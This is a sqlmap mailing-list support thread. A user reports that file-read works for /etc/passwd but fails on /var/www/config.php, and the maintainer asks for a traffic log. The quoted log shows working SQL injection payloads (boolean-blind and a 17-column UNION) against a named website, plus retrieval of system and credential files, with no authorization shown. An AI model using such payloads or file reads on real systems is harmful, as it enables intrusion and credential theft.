Hi Bob.

Could you please send one of those problematic retrieved files?

Also, a traffic file would be nice (just append -t traffic.txt to a normal
run).

Kind regards,
Miroslav Stampar
On Jun 16, 2012 10:51 AM, "Bob" <stock.l...@qq.com> wrote:

> Hi all,
>
> I use file-read to retrieve files on the server.
>
> /etc/passwd works,
>
> but for others the response is as follows.
>
> [16:44:14] [INFO] resuming back-end DBMS 'mysql 5' from session file
> [16:44:14] [INFO] testing connection to the target url
> sqlmap identified the following injection points with a total of 0 HTTP(s)
> requests:
> ---
> Place: GET
> Parameter: su_sd
>     Type: boolean-based blind
>     Title: AND boolean-based blind - WHERE or HAVING clause (Generic
> comment)
>     Payload: Fai=&SU=&nw=&su_sd=%' AND 5207=5207-- &pe=650
>
>     Type: UNION query
>     Title: MySQL UNION query (NULL) - 17 columns
>     Payload: Fai=&SU=&nw=&su_sd=%' LIMIT 1,1 UNION ALL SELECT NULL,
> CONCAT(0x3a7a66623a,0x5a546342474b66515343,0x3a777a663a), NULL, NULL, NULL,
> NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL,
> NULL#&pe=650
> ---
>
> [16:44:16] [INFO] the back-end DBMS is MySQL
> [16:44:16] [INFO] fetching banner
> web server operating system: Linux Fedora 15 (Lovelock)
> web application technology: PHP 5.3.8, Apache 2.2.17
> back-end DBMS: MySQL 5
> banner:    '5.1.60'
>
> [16:44:16] [INFO] fingerprinting the back-end DBMS operating system
> [16:44:16] [INFO] the back-end DBMS operating system is Linux
> [16:44:16] [INFO] fetching file: '/var/www/config.php'
> [16:44:16] [ERROR] for some reason(s) sqlmap retrieved an odd-length
> hexadecimal string which it is not able to convert to raw string
> /var/www/config.php file saved to:    '/pentest/database/sqlmap/output/
> www.kangyang.com.tw/files/_var_www_config.php'
>
> [16:44:16] [INFO] fetched data logged to text files under
> '/pentest/database/sqlmap/output/www.kangyang.com.tw'
>
> [*] shutting down at 16:44:16
>
>
>
> ------------------------------------------------------------------------------
> Live Security Virtual Conference
> Exclusive live event will cover all the ways today's security and
> threat landscape has changed and how IT managers can respond. Discussions
> will include endpoint security, mobile security and the latest in malware
> threats. http://www.accelacomm.com/jaw/sfrnl04242012/114/50122263/
> _______________________________________________
> sqlmap-users mailing list
> sqlmap-users@lists.sourceforge.net
> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>
>